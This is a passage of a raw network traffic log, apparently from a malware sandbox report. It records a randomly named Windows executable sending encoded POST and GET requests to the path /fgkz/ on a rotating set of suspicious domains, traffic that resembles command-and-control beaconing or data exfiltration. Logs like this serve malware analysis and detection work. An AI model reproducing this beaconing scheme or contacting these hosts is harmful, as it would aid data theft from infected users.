                                Data Ascii: -down"> <li> <a href="http://www.theranchobizarro.com/marketplace" class="uppercase light-text-main">Marketplace</a> </li> <li> <a href="http://www.theranchobizarro.com/pricing#pricing" class="uppercase light-text-main">Pricing</a> </li> <li>
                                Aug 30, 2024 07:19:13.142513037 CEST | 896 | IN
                                Data Ascii: n</a> </li> <li> <a href="http://www.theranchobizarro.com/register" class="uppercase waves-effect waves-block waves-light center-align">Sign Up</a> </li> </ul> ... END HEADER --> ... START MAIN --> <div id="main" style="paddin
                                Aug 30, 2024 07:19:13.142533064 CEST | 1236 | IN
                                Data Ascii: ss="footer-copyright row no-margin"> <div class="light-text-secondary center col s12"> <span class="left hide-on-small-only"><a href="http://www.theranchobizarro.com/sitemap.xml" target="_blank">Sitemap</a></span> <span class="left hide-on-sma
                                Aug 30, 2024 07:19:13.142545938 CEST | 360 | IN
                                Data Ascii: theranchobizarro.com/build/js/compiled/backend/app-56cea615a1.js"></script>...prism-->...scrollbar-->...plugins.js - Some Specific JS codes for Plugin Settings-->... lazyload -->... Typeahead --> <script src="http://www.ther


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                9 | 192.168.2.5 | 49727 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:26.991449118 CEST | 624 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sciencebot.sbs
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sciencebot.sbs
                                Referer: http://www.sciencebot.sbs/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=JudN/Z6K+spfRyhtoRZPkDcJ/LQY9m/kmYrJUUhaEtui26+AfbpGeveiGCQaHr2wbRJyLHg3GJnmGCAGx3aQKMh/TbNfTEvrkkA0EBIPvNIfVopw9VabilQytTxoh1TpgIB/G1exmOEnNm3B3Rd2SPHoyliNoWNkw7OzSvTXQ2lmzu7CwQ==
                                Aug 30, 2024 07:19:27.634120941 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                10 | 192.168.2.5 | 49728 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:29.513371944 CEST | 644 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sciencebot.sbs
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sciencebot.sbs
                                Referer: http://www.sciencebot.sbs/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=JudN/Z6K+spfQTRt7G1PsDcK6LQY3G/omYnJUQ5sEeKi1aOANJBGNfeiOiQbNL2ubRN6LF03GJbmGCQGyEyfLch9ZLNndkvrkkA0EBc1vNAfWYZw6Eac81Qt6jxorlTtgIBnGwGbmMMnNizB0Ad3LfHu/FjflUYz7dazTqXXASN4/bXR3vI221ipQIpAKN/WhKuGlBk=
                                Aug 30, 2024 07:19:30.156521082 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                11 | 192.168.2.5 | 49729 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:32.044250965 CEST | 1657 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sciencebot.sbs
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sciencebot.sbs
                                Referer: http://www.sciencebot.sbs/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:32.725709915 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                12 | 192.168.2.5 | 49730 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:34.579659939 CEST | 348 | OUT | GET /fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.sciencebot.sbs
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:35.230638981 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                13 | 192.168.2.5 | 49731 | 119.18.54.85 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:41.188098907 CEST | 633 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.gpcamservices.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.gpcamservices.com
                                Referer: http://www.gpcamservices.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=/6tBPUsxHxv2AD+BIFJnzG83zwjN4CFjxohqCpKdCHKFk8jp6enOnowCEBzi+zmexjNToWodXv3C2aM5DcFBzzSpae96ED2VDIxd98RUCFwaEU5ACvfBVz5yPvjLgKouNDOS02Fy4YQFHjHztcIfvZx9lEQd+bf87dstFoab/EOo2KM1Fg==
                                Aug 30, 2024 07:19:42.210309029 CEST | 643 | IN | HTTP/1.1 404 Not Found
                                Date: Fri, 30 Aug 2024 05:19:42 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 358
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                14 | 192.168.2.5 | 49732 | 119.18.54.85 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:43.774899960 CEST | 653 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.gpcamservices.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.gpcamservices.com
                                Referer: http://www.gpcamservices.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=/6tBPUsxHxv2BgmBKidn7G84qwjNyiFnxo9qCsrGC1eFlerporHOgowCMhznzTmVxjRboTIdXvjC2b85DvtAzjSvGe94Kj2VDIxd98FqCFoaEkJADLLOfT5xMvjLrqpnNDOK03pM4eUFHi3zqNIemZx7qkRy44GH8PUEEbfwuHX0+/gmCdiyu7ttkBZmlRD7Lllw8zU=
                                Aug 30, 2024 07:19:44.888045073 CEST | 643 | IN | HTTP/1.1 404 Not Found
                                Date: Fri, 30 Aug 2024 05:19:44 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 358
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                15 | 192.168.2.5 | 49733 | 119.18.54.85 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:46.338232994 CEST | 1666 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.gpcamservices.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.gpcamservices.com
                                Referer: http://www.gpcamservices.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:47.329751968 CEST | 643 | IN | HTTP/1.1 404 Not Found
                                Date: Fri, 30 Aug 2024 05:19:47 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 358
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                16 | 192.168.2.5 | 49734 | 119.18.54.85 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:48.875889063 CEST | 351 | OUT | GET /fgkz/?nFeHa=dbNpTj&4f2t8=y4FhMh12ATfkFg6tImNw7XoZ6hnl8AB4notnPujEUk+EgZuT0tb2uZJUNE/t4waZuxpptBF/Humi+b09KdNA9iSMBM18JBKWRg== HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.gpcamservices.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:49.859873056 CEST | 844 | IN | HTTP/1.1 404 Not Found
                                Date: Fri, 30 Aug 2024 05:19:49 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 01 Mar 2021 17:22:29 GMT
                                Accept-Ranges: bytes
                                Content-Length: 583
                                Vary: Accept-Encoding
                                Content-Type: text/html
                                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                17 | 192.168.2.5 | 49735 | 66.29.154.248 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:55.167804956 CEST | 615 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.slimdut.top
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.slimdut.top
                                Referer: http://www.slimdut.top/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=zk2nm1qat3iXipNNK8Rh1NEzq0T+kY8BfuAVv6t6d1UvbKZUrlF71Cmo7HtHDeMgUDV8G4DghSTjSOo9uVThrFC/Q4g13nQhyqhSOtOHJnQjwfpxq/pseHqP0RUO5QGLU2GdGBBGnuPvRlut/SPN0x4sNlRgorlGiZNq9lN0v489Ye4t0A==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                18 | 192.168.2.5 | 49736 | 66.29.154.248 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:57.700582027 CEST | 635 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.slimdut.top
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.slimdut.top
                                Referer: http://www.slimdut.top/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=zk2nm1qat3iXgI9NMf5h0tEy2kT+q48Nfv8Vv7ZqdHwvVP9UqkF78Smou3tGO+M+UDZCG4vghWDjSKs9uGrgqVChbYg3q3QhyqhSOtatJm0jxrtxtuprC3qM+xUOrgHMU2HyGFIOnt3vRlet/DPO/x42AFR/4aM+hJdGwUcrxJgoUrU+z0UoEmd3bC0375YlCWHab3I=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                19 | 192.168.2.5 | 49737 | 66.29.154.248 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:00.231659889 CEST | 1648 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.slimdut.top
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.slimdut.top
                                Referer: http://www.slimdut.top/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                20 | 192.168.2.5 | 49738 | 66.29.154.248 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:02.919780970 CEST | 345 | OUT | GET /fgkz/?4f2t8=+meHlBDXvFG0tp5IHuNp5aNfi3jbma4/KPg1jYwxKUxzXvorilFM4RqNjl5oI+tAWQpMLL6Kz03IcJJlzmvukn6IT7E7w1sf4w==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.slimdut.top
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                21 | 192.168.2.5 | 49739 | 104.21.92.135 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:29.355699062 CEST | 618 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.otomain.info
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.otomain.info
                                Referer: http://www.otomain.info/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=umhSuIzPrtKTVyM3WfRRXt4/SSBBI3FavZia3HCaYaFCOrKYBZbARYjTmVjvR9QuBZd9uHGOIQjCbeSGJHD4wx1U2GzYIX6AqxnPc1nxq7fSoBVSIktWHvRREOGbWU9K6NypWIyVWF3ZfsWYV/yKmWIsf/SIXzssRbw4Mf436jjmeUoxoQ==
                                Aug 30, 2024 07:20:30.204194069 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                Date: Fri, 30 Aug 2024 05:20:30 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Referrer-Policy: same-origin
                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ts2nI1Oby4%2FtQ4omscmXl732VVJHxcLU6pMCmLXJXnzzcRhTvv9hoCaNNRsC4sOFvYvOF1U%2F9aYZFU0WKuqgDJddEPsrVtzM%2FVDQbxmf%2FwgvKcErBIWz6mvlZbgPkHkQ7SFT"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8bb254fa1ccc7c9c-EWR
                                Content-Encoding: gzip


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                22 | 192.168.2.5 | 49740 | 104.21.92.135 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:31.889008045 CEST | 638 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.otomain.info
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.otomain.info
                                Referer: http://www.otomain.info/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=umhSuIzPrtKTayQ3Q+RRQN44OCBBGXEyvYea3FuKYohCOK6YAdvAWYjT/ljqV9RgBZRTuG6OIRHCbcKGO0r7hx1B+mzeMX6AqxnPc1yUq7HSpxlSJFtVbfRSDOGbSU8D6NyfWM67WArZfpyYVtaJvWIuSfTsaCVFV90BDco8jDKJbBEivlJ/Vq2plxHjlMz6FrWc2z8=
                                Aug 30, 2024 07:20:32.559743881 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                Date: Fri, 30 Aug 2024 05:20:32 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Referrer-Policy: same-origin
                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DdYoLHquPxfvO8Xz9kVUebCgSzPF32K607u1mB7TGBaQBmT1uTzn1nOuHC0ro6oVE1NZ7srYw%2Bskcw8FZ4T3sAVZuQsqmHPqFPN4t3KgGMytwH6YYkHvNtE3kl52t12ZidTA"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8bb25509fbf57cab-EWR
                                Content-Encoding: gzip


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                23 | 192.168.2.5 | 49741 | 104.21.92.135 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:34.419315100 CEST | 1651 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.otomain.info
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.otomain.info
                                Referer: http://www.otomain.info/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:20:35.167500019 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                Date: Fri, 30 Aug 2024 05:20:35 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Referrer-Policy: same-origin
                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9oKK3Fx0eK3F%2B5XuPMwyyK5L1R3DXCj2RSMMfW9S1sP1WwmrBi3K3cgWjwUKICYwnoqIVLHPWH606WiK8K3fagLlk3V6IViUuruPn2O8l4YYa50scFBGPAf9c6XID%2Fjz9LS"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8bb25519a8b61a1b-EWR
                                Content-Encoding: gzip


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                24 | 192.168.2.5 | 49742 | 104.21.92.135 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:36.952610016 CEST | 346 | OUT | GET /fgkz/?nFeHa=dbNpTj&4f2t8=jkJyt4aMtNKoYD5sbuFVc9QyaTZ4K2J/yr+l21//H5N/WdfnKajTYLfT/HfxXPoaC4ByuXnDUz3XZuyNEmOuuyoe00P8CgSW4g== HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.otomain.info
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:20:37.686898947 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                Date: Fri, 30 Aug 2024 05:20:37 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Referrer-Policy: same-origin
                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4VTd3e2kN%2BX4JlJqO1c9KRzoroOiyYw%2BJlzDiSSgMDeX5Jdwns%2FI%2BKn4pvDkmdTolQexX2IBEj%2BGvGC6btTaSdOirvtVWw6FswpIkZWgdr2a0r7ILG5OioTyW%2BX5W7CX8e7k"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8bb255297edb43fb-EWR
                                Data Ascii: 17ba<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS points to prohibited IP | www.otomain.info | Cloudflare</title><meta charset="UTF-8" /><m


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                25 | 192.168.2.5 | 49743 | 122.10.12.59 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:43.185888052 CEST | 612 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.uty803.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.uty803.com
                                Referer: http://www.uty803.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=Xc2pHUoEkm+OaFADjXl+D/VcMzrNuDie9Qy1NTE/0WxnSfdV3kMpbGHF3yScmSliY3jHfyH0nuuV/wLAgFoDRmDQhebFo/Mp1cZkWK/uq0rZVVxl8okvXkL8ZNfoBd94TKTni5d5aTH88AK0Tptq7C4UTXM25ZsxDXWuZKSYwbQAPwXlFA==
                                Aug 30, 2024 07:20:44.879622936 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:43 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
